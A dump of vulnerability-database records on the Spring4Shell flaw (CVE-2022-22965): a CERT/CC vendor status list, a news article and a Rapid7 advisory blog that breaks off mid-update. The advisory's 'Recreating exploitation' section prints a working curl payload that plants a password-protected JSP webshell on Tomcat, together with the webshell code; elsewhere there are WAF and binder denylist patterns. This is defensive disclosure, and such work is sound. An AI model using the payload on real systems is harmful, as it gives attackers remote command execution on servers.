References\n\n * <https://fortiguard.fortinet.com/psirt/FG-IR-22-072>\n\n### GeoServer __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://geoserver.org/announcements/vulnerability/2022/04/01/spring.html>\n\n### Kofax __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.kofax.com/s/question/0D53m00006FG8NVCA1/communications-manager-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006w0My3CAE/controlsuite-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8RtCAL/readsoft-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8ThCAL/robotic-process-automation-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8QdCAL/markview-release-announcements>\n * <https://knowledge.kofax.com/General_Support/General_Troubleshooting/Kofax_products_and_Spring4Shell_vulnerability_information>\n\n### McAfee __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-11 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://kc.mcafee.com/corporate/index?page=content&id=KB95447](<https://kc.mcafee.com/corporate/index?page=content&id=KB95447>)\n\n### ServiceNow __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://community.servicenow.com/community?id=community_question&sys_id=5530394edb2e8950e2adc2230596194f](<https://community.servicenow.com/community?id=community_question&sys_id=5530394edb2e8950e2adc2230596194f>)\n\n### TIBCO __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-05-19\n\n**Statement Date: May 17, 2022**\n\n**CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.tibco.com/support/notices/spring-framework-vulnerability-update>\n\n### Alphatron Medical Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### PagerDuty Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 39 vendors __View less vendors __\n\n \n\n\n### References\n\n * <https://tanzu.vmware.com/security/cve-2022-22965>\n * <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>\n * <https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html>\n * <https://github.com/NCSC-NL/spring4shell/blob/main/software/README.md>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2022-22965 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2022-22965>) \n---|--- \n**Date Public:** | 2022-03-30 \n**Date First Published:** | 2022-03-31 \n**Date Last Updated: ** | 2022-05-19 16:09 UTC \n**Document Revision: ** | 22 \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "cert", "title": "Spring Framework insecurely handles PropertyDescriptor objects with data binding", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-05-19T16:09:00", "id": "VU:970766", "href": "https://www.kb.cert.org/vuls/id/970766", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:25", "description": "[![Java Spring Framework 0-Day RCE](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgcabrqTD1UQL7HzljPrvwqXCYkv1djclox3AcQ8Na_vxMGVKwdIvy2QcZ94T6oEON-yCPdjn3NS1gjIhnvO0vhWztDQGuRG-vGMFK-4gF5h-JCwb15c_pE1mTCO9ZQFElckaP6p-wzLgC28Pp1MWGFMwW6ZXK8kjJu7rkmX4n7CbstCx-sROAhbl6t/s728-e1000/java-spring-framework.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgcabrqTD1UQL7HzljPrvwqXCYkv1djclox3AcQ8Na_vxMGVKwdIvy2QcZ94T6oEON-yCPdjn3NS1gjIhnvO0vhWztDQGuRG-vGMFK-4gF5h-JCwb15c_pE1mTCO9ZQFElckaP6p-wzLgC28Pp1MWGFMwW6ZXK8kjJu7rkmX4n7CbstCx-sROAhbl6t/s728-e100/java-spring-framework.jpg>)\n\nA zero-day remote code execution (RCE) vulnerability has come to light in the Spring framework shortly after a Chinese security researcher [briefly leaked](<https://twitter.com/vxunderground/status/1509170582469943303>) a [proof-of-concept](<https://github.com/tweedge/springcore-0day-en>) (PoC) [exploit](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) on GitHub before deleting their account.\n\nAccording to cybersecurity firm Praetorian, the unpatched flaw impacts Spring Core on Java Development Kit ([JDK](<https://en.wikipedia.org/wiki/Java_Development_Kit>)) versions 9 and later and is a bypass for another vulnerability tracked as [CVE-2010-1622](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>), enabling an unauthenticated attacker to execute arbitrary code on the target system.\n\nSpring is a [software framework](<https://en.wikipedia.org/wiki/Spring_Framework>) for building Java applications, including web apps on top of the Java EE (Enterprise Edition) platform.\n\n\"In certain configurations, exploitation of this issue is straightforward, as it only requires an attacker to send a crafted HTTP request to a vulnerable system,\" researchers Anthony Weems and Dallas Kaman [said](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>). \"However, exploitation of different configurations will require the attacker to do additional research to find payloads that will be effective.\"\n\nAdditional details of the flaw, dubbed \"**SpringShell**\" and \"**Spring4Shell**,\" have been withheld to prevent exploitation attempts and until a fix is in place by the framework's maintainers, Spring.io, a subsidiary of VMware. It's also yet to be assigned a Common Vulnerabilities and Exposures (CVE) identifier.\n\nIt's worth noting that the flaw targeted by the zero-day exploit is different from two previous vulnerabilities disclosed in the application framework this week, including the Spring Framework expression DoS vulnerability ([CVE-2022-22950](<https://tanzu.vmware.com/security/cve-2022-22950>)) and the Spring Cloud expression resource access vulnerability ([CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>)).\n\n[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhravc9h6Jt8CniALz9rmUeOODWW7XOdJIlvXQbqQkpHJj5wBhPstmROb2bwynD_ugHL4A6E-wxt6DP6LTLoHFp7_ksvQ3j_SdaY4Y7l_XNW3trRxMFhWTLGm3Kju7DTSYzgG4TFLWcIcBi1hChVTWwYbalxyEWYe57BJjxvvGeqT46gjU6bHM1jJYd/s728-e100/whoami.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhravc9h6Jt8CniALz9rmUeOODWW7XOdJIlvXQbqQkpHJj5wBhPstmROb2bwynD_ugHL4A6E-wxt6DP6LTLoHFp7_ksvQ3j_SdaY4Y7l_XNW3trRxMFhWTLGm3Kju7DTSYzgG4TFLWcIcBi1hChVTWwYbalxyEWYe57BJjxvvGeqT46gjU6bHM1jJYd/s728-e100/whoami.jpg>)\n\nIn the interim, Praetorian researchers are recommending \"creating a ControllerAdvice component (which is a Spring component shared across Controllers) and adding dangerous patterns to the denylist.\"\n\nInitial analysis of the new code execution flaw in Spring Core suggests that its impact may not be severe. \"[C]urrent information suggests in order to exploit the vulnerability, attackers will have to locate and identify web app instances that actually use the DeserializationUtils, something already known by developers to be dangerous,\" Flashpoint [said](<https://www.flashpoint-intel.com/blog/what-is-springshell-what-we-know-about-the-springshell-vulnerability/>) in an independent analysis.\n\nDespite the public availability of PoC exploits, \"it's currently unclear which real-world applications use the vulnerable functionality,\" Rapid7 [explained](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>). \"Configuration and JRE version may also be significant factors in exploitability and the likelihood of widespread exploitation.\"\n\nThe Retail and Hospitality Information Sharing and Analysis Center (ISAC) also [issued a statement](<https://www.rhisac.org/press-release/spring-framework-rce-vulnerability/>) that it has investigated and confirmed the \"validity\" of the PoC for the RCE flaw, adding it's \"continuing tests to confirm the validity of the PoC.\"\n\n\"The Spring4Shell exploit in the wild appears to work against the stock 'Handling Form Submission' sample code from spring.io,\" CERT/CC vulnerability analyst Will Dormann [said](<https://twitter.com/wdormann/status/1509372145394200579>) in a tweet. \"If the sample code is vulnerable, then I suspect there are indeed real-world apps out there that are vulnerable to RCE.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T05:52:00", "type": "thn", "title": "Unpatched Java Spring Framework 0-Day RCE Bug Threatens Enterprise Web Apps Security", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22950", "CVE-2022-22963"], "modified": "2022-03-31T15:27:03", "id": "THN:51196AEF32803B9BBB839D4CADBF5B38", "href": "https://thehackernews.com/2022/03/unpatched-java-spring-framework-0-day.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2022-04-08T21:29:15", "description": "![Spring4Shell: Zero-Day Vulnerability in Spring Framework \$CVE-2022-22965\$](https://blog.rapid7.com/content/images/2022/03/spring4shell.jpg)\n\n_Rapid7 has completed remediating the instances of Spring4Shell (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that we found on our internet-facing services and systems. For further information and updates about our internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>)._\n\nIf you are like many in the cybersecurity industry, any mention of a zero-day in an open-source software (OSS) library may cause a face-palm or audible groans, especially given the fast-follow from the [Log4j vulnerability](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>). While discovery and research is evolving, we\u2019re posting the facts we\u2019ve gathered and updating guidance as new information becomes available.\n\n## What Rapid7 Customers Can Expect\n\nThis is an evolving incident. Our team is continuing to investigate and validate additional information about this vulnerability and its impact. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+. CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates.\n\n### Vulnerability Risk Management\n\nThe April 1, 2022 content update released at 7:30 PM EDT contains authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. We are also targeting an Insight Agent release the week of April 11 to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable. We also have an authenticated Windows check available as of the April 7th content release, which requires the April 6th product release (version 6.6.135). More information on how to scan for Spring4Shell with InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### Application Security\n\nA block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --> AppFw --> Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy. tCell will also detect certain types of exploitation attempts based on publicly available payloads, and will also alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as CVE 2022-22965) are loaded by the application.\n\nInsightAppSec customers can scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>) released April 1, 2022. For guidance on securing applications against Spring4Shell, read our [blog here](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>).\n\n### Cloud Security\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nIf the vulnerability is detected in a customer environment, they can leverage filters in InsightCloudSec to focus specifically on the highest risk resources, such as those on a public subnet, to help prioritize remediation. Users can also create a bot to either automatically notify resource owners of the existence of the vulnerability or automatically shut down vulnerable instances in their environment.\n\n### InsightIDR and Managed Detection and Response\n\nWhile InsightIDR does not have a direct detection available for this exploit, we do have behavior- based detection mechanisms in place to alert on common follow-on attacker activity.\n\n## Introduction\n\nOur team is continuing to investigate and validate additional information about this vulnerability and its impact. This is a quickly evolving incident, and we are researching development of both assessment capabilities for our vulnerability management and application security solutions and options for preventive controls. As additional information becomes available, we will evaluate the feasibility of vulnerability checks, attack modules, detections, and Metasploit modules.\n\nWhile Rapid7 does not have a direct detection in place for this exploit, we do have behavior- based detection mechanisms in place to alert on common follow-on attacker activity. tCell will also detect certain types of exploitation based on publicly available payloads.\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+. CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates. Our next update will be at noon EDT on March 31, 2022.\n\nOn March 30, 2022, rumors began to circulate about an unpatched remote code execution vulnerability in Spring Framework when a Chinese-speaking [researcher](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>) published a [GitHub commit](<https://github.com/helloexp/0day/tree/14757a536fcedc8f4436fed6efb4e0846fc11784/22-Spring%20Core>) that contained proof-of-concept (PoC) exploit code. The exploit code targeted a zero-day vulnerability in the Spring Core module of the Spring Framework. Spring is maintained by [Spring.io](<https://spring.io/>) (a subsidiary of VMWare) and is used by many Java-based enterprise software frameworks. The vulnerability in the leaked proof of concept, which appeared to allow unauthenticated attackers to execute code on target systems, was quickly [deleted](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>).\n\n![Spring4Shell: Zero-Day Vulnerability in Spring Framework \$CVE-2022-22965\$](https://blog.rapid7.com/content/images/2022/03/spring-beans-rce.png)\n\nA lot of confusion followed for several reasons: First, the vulnerability (and proof of concept) isn\u2019t exploitable with out-of-the-box installations of Spring Framework. The application has to use specific functionality, which we explain below. Second, a completely different unauthenticated RCE vulnerability was [published](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) March 29, 2022 for Spring Cloud, which led some in the community to conflate the two unrelated vulnerabilities.\n\nRapid7\u2019s research team can confirm the zero-day vulnerability is real and provides unauthenticated remote code execution. Proof-of-concept exploits exist, but it\u2019s currently unclear which real-world applications use the vulnerable functionality. As of March 31, Spring has also [confirmed the vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. It affects Spring MVC and Spring WebFlux applications running on JDK 9+.\n\n## Known risk\n\nThe following conditions map to known risk so far:\n\n * Any components using Spring Framework versions before 5.2.20, 5.3.18 **AND** JDK version 9 or higher **are considered [potentially vulnerable](<https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751>)**;\n * Any components that meet the above conditions **AND** are using @RequestMapping annotation and Plain Old Java Object (POJO) parameters **are considered actually vulnerable** and are at some risk of being exploited;\n * Any components that meet the above conditions **AND** are running Tomcat **are _currently_ most at risk of being exploited** (due to [readily available exploit code](<https://github.com/craig/SpringCore0day>) that is known to work against Tomcat-based apps).\n\n## Recreating exploitation\n\nThe vulnerability appears to affect functions that use the [@RequestMapping](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/web/bind/annotation/RequestMapping.html>) annotation and POJO (Plain Old Java Object) parameters. Here is an example we hacked into a [Springframework MVC demonstration](<https://github.com/RameshMF/spring-mvc-tutorial/tree/master/springmvc5-helloworld-exmaple>):\n \n \n package net.javaguides.springmvc.helloworld.controller;\n \n import org.springframework.stereotype.Controller;\n import org.springframework.web.bind.annotation.InitBinder;\n import org.springframework.web.bind.annotation.RequestMapping;\n \n import net.javaguides.springmvc.helloworld.model.HelloWorld;\n \n /**\n * @author Ramesh Fadatare\n */\n @Controller\n public class HelloWorldController {\n \n \t@RequestMapping(\"/rapid7\")\n \tpublic void vulnerable(HelloWorld model) {\n \t}\n }\n \n\nHere we have a controller (`HelloWorldController`) that, when loaded into Tomcat, will handle HTTP requests to `http://name/appname/rapid7`. The function that handles the request is called `vulnerable` and has a POJO parameter `HelloWorld`. Here, `HelloWorld` is stripped down but POJO can be quite complicated if need be:\n \n \n package net.javaguides.springmvc.helloworld.model;\n \n public class HelloWorld {\n \tprivate String message;\n }\n \n\nAnd that\u2019s it. That\u2019s the entire exploitable condition, from at least Spring Framework versions 4.3.0 through 5.3.15. (We have not explored further back than 4.3.0.)\n\nIf we compile the project and host it on Tomcat, we can then exploit it with the following `curl` command. Note the following uses the exact same payload used by the original proof of concept created by the researcher (more on the payload later):\n \n \n curl -v -d \"class.module.classLoader.resources.context.parent.pipeline\n .first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%\n 22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRunt\n ime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%\n 20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20\n while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7\n D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context\n .parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources\n .context.parent.pipeline.first.directory=webapps/ROOT&class.module.cl\n assLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&cl\n ass.module.classLoader.resources.context.parent.pipeline.first.fileDat\n eFormat=\" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-\n SNAPSHOT/rapid7\n \n\nThis payload drops a password protected webshell in the Tomcat ROOT directory called `tomcatwar.jsp`, and it looks like this:\n \n \n - if(\"j\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in\n = -.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();\n int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))3D-1){ out.\n println(new String(b)); } } -\n \n\nAttackers can then invoke commands. Here is an example of executing `whoami` to get `albinolobster`:\n\n![Spring4Shell: Zero-Day Vulnerability in Spring Framework \$CVE-2022-22965\$](https://blog.rapid7.com/content/images/2022/03/curl.png)\n\nThe Java version does appear to matter. Testing on OpenJDK 1.8.0_312 fails, but OpenJDK 11.0.14.1 works.\n\n## About the payload\n\nThe payload we\u2019ve used is specific to Tomcat servers. It uses a technique that was popular as far back as the 2014, that alters the **Tomcat** server\u2019s logging properties via ClassLoader. The payload simply redirects the logging logic to the `ROOT` directory and drops the file + payload. A good technical write up can be found [here](<https://hacksum.net/2014/04/28/cve-2014-0094-apache-struts-security-bypass-vulnerability/>).\n\nThis is just one possible payload and will not be the only one. We\u2019re certain that malicious class loading payloads will appear quickly.\n\n## Mitigation guidance\n\nAs of March 31, 2022, CVE-2022-22965 has been assigned and Spring Framework versions 5.3.18 and 5.2.20 have been released to address it. Spring Framework users should update to the fixed versions starting with internet-exposed applications that meet criteria for vulnerability (see `Known Risk`). As organizations build an inventory of affected applications, they should also look to gain visibility into process execution and application logs to monitor for anomalous activity.\n\nFurther information on the vulnerability and ongoing guidance are being provided in [Spring\u2019s blog here](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>). The Spring [documentation](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html>) for DataBinder explicitly notes that:\n\n\u200b\u200b\u2026there are potential security implications in failing to set an array of allowed fields. In the case of HTTP form POST data for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.\n\nTherefore, one line of defense would be to modify source code of custom Spring applications to ensure those field guardrails are in place. Organizations that use third-party applications susceptible to this newly discovered weakness cannot take advantage of this approach.\n\nIf your organization has a web application firewall (WAF) available, profiling any affected Spring-based applications to see what strings can be used in WAF detection rulesets would help prevent malicious attempts to exploit this weakness.\n\nIf an organization is unable to patch or use the above mitigations, one failsafe option is to model processes executions on systems that run these Spring-based applications and then monitor for anomalous, \u201cpost-exploitation\u201d attempts. These should be turned into alerts and acted upon immediately via incident responders and security automation. One issue with this approach is the potential for false alarms if the modeling was not comprehensive enough.\n\n## Vulnerability disambiguation\n\nThere has been significant confusion about this zero-day vulnerability because of an unrelated vulnerability in another Spring project that was published March 29, 2022. That vulnerability, [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>), affects Spring Cloud Function, which is not in Spring Framework. Spring released version 3.1.7 & 3.2.3 to address CVE-2022-22963 on March 29.\n\nFurther, yet another vulnerability [CVE-2022-22950](<https://tanzu.vmware.com/security/cve-2022-22950>) was assigned on March 28. A fix was released on the same day. To keep things confusing, this medium severity vulnerability (which can cause a DoS condition) DOES affect Spring Framework versions 5.3.0 - 5.3.16.\n\n## Updates\n\n### March 30, 2020 - 9PM EDT\n\nThe situation continues to evolve but Spring.IO has yet to confirm the vulnerability. That said, we are actively testing exploit techniques and combinations. In the interim for organizations that have large deployments of the core Spring Framework or are in use for business critical applications we have validated the following two mitigations. Rapid7 Labs has not yet seen evidence of exploitation in the wild.\n\n#### WAF Rules\n\nReferenced previously and reported elsewhere for organizations that have WAF technology, string filters offer an effective deterrent, "class._", "Class._", "_.class._", and "_.Class._". These should be tested prior to production deployment but are effective mitigation techniques.\n\n#### Spring Framework Controller advice\n\nOur friends at [Praetorian](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>) have suggested a heavy but validated mitigation strategy by using the Spring Framework to disallow certain patterns. In this case any invocation containing \u201cclass\u201d. Praetorian example is provided below. The heavy lift requires recompiling code, but for those with few options it does prevent exploitation.\n\nimport org.springframework.core.Ordered; \nimport org.springframework.core.annotation.Order; \nimport org.springframework.web.bind.WebDataBinder; \nimport org.springframework.web.bind.annotation.ControllerAdvice; \nimport org.springframework.web.bind.annotation.InitBinder;\n\n@ControllerAdvice \n@Order(10000) \npublic class BinderControllerAdvice { \n@InitBinder \npublic void setAllowedFields(WebDataBinder dataBinder) { \nString[] denylist = new String[]{"class._", "Class._", "_.class._", "_.Class._"}; \ndataBinder.setDisallowedFields(denylist); \n} \n}\n\n### March 31, 2022 - 7 AM EDT\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and is working on an emergency release. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+.\n\nOur next update will be at noon EDT on March 31, 2022.\n\n### March 31, 2022 - 10 AM EDT\n\nCVE-2022-22965 has been assigned to this vulnerability. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it.\n\n### March 31, 2022 - 12 PM EDT\n\nWe have added a `Known Risk` section to the blog to help readers understand the conditions required for applications to be potentially or known vulnerable.\n\nOur team is testing ways of detecting the vulnerability generically and will update on VM and appsec coverage feasibility by 4 PM EDT today (March 31, 2022).\n\n### March 31, 2022 - 4 PM EDT\n\ntCell will alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as CVE 2022-22965) are loaded by the application. The tCell team is also working on adding a specific detection for Spring4Shell. An InsightAppSec attack module is under development and will be released to all application security customers (ETA April 1, 2022). We will publish additional guidance and detail for application security customers tomorrow, on April 1.\n\nInsightVM customers utilizing Container Security can now assess containers that have been built with a vulnerable version of Spring. At this time we are not able to identify vulnerable JAR files embedded with WAR files in all cases, which we are working on improving. Our team is continuing to test ways of detecting the vulnerability and will provide another update on the feasibility of VM coverage at 9 PM EDT.\n\n### March 31, 2022 - 9 PM EDT\n\nMultiple [reports](<https://twitter.com/bad_packets/status/1509603994166956049>) have indicated that attackers are scanning the internet for applications vulnerable to Spring4Shell. There are several reports of exploitation in the wild. SANS Internet Storm Center [confirmed exploitation in the wild](<https://isc.sans.edu/forums/diary/Spring+Vulnerability+Update+Exploitation+Attempts+CVE202222965/28504/>) earlier today.\n\nOur team is working on both authenticated and remote vulnerability checks for InsightVM and Nexpose customers. We will provide more specific ETAs in our next update at 11 AM EDT on April 1.\n\n### April 1, 2022 - 11 AM EDT\n\nOur team is continuing to test ways of detecting CVE-2022-22965 and expects to have an authenticated check for Unix-like systems available to InsightVM and Nexpose customers in today\u2019s (April 1) content release. We are also continuing to research remote check capabilities and will be working on adding InsightAgent support in the coming days. Our next update will be at 3 PM EDT on April 1, 2022.\n\nFor information and updates about Rapid7\u2019s internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>). At this time, we have not detected any successful exploit attempts in our systems or solutions.\n\n### April 1, 2022 - 3 PM EDT\n\nOur team intends to include an authenticated check for InsightVM and Nexpose customers in a content-only release this evening (April 1). We will update this blog at or before 10 PM EDT with the status of that release.\n\nAs of today, a new block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --> AppFw --> Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy.\n\n### April 1 - 7:30 PM EDT\n\nInsightVM and Nexpose customers can now scan their environments for Spring4Shell with authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. We are also targeting an Insight Agent release next week to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable.\n\nOur team is actively working on a Windows authenticated check as well as improvements to the authenticated Unix and remote checks. More information on how to scan for Spring4Shell with InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nInsightAppSec customers can now scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>). A [blog is available](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>) 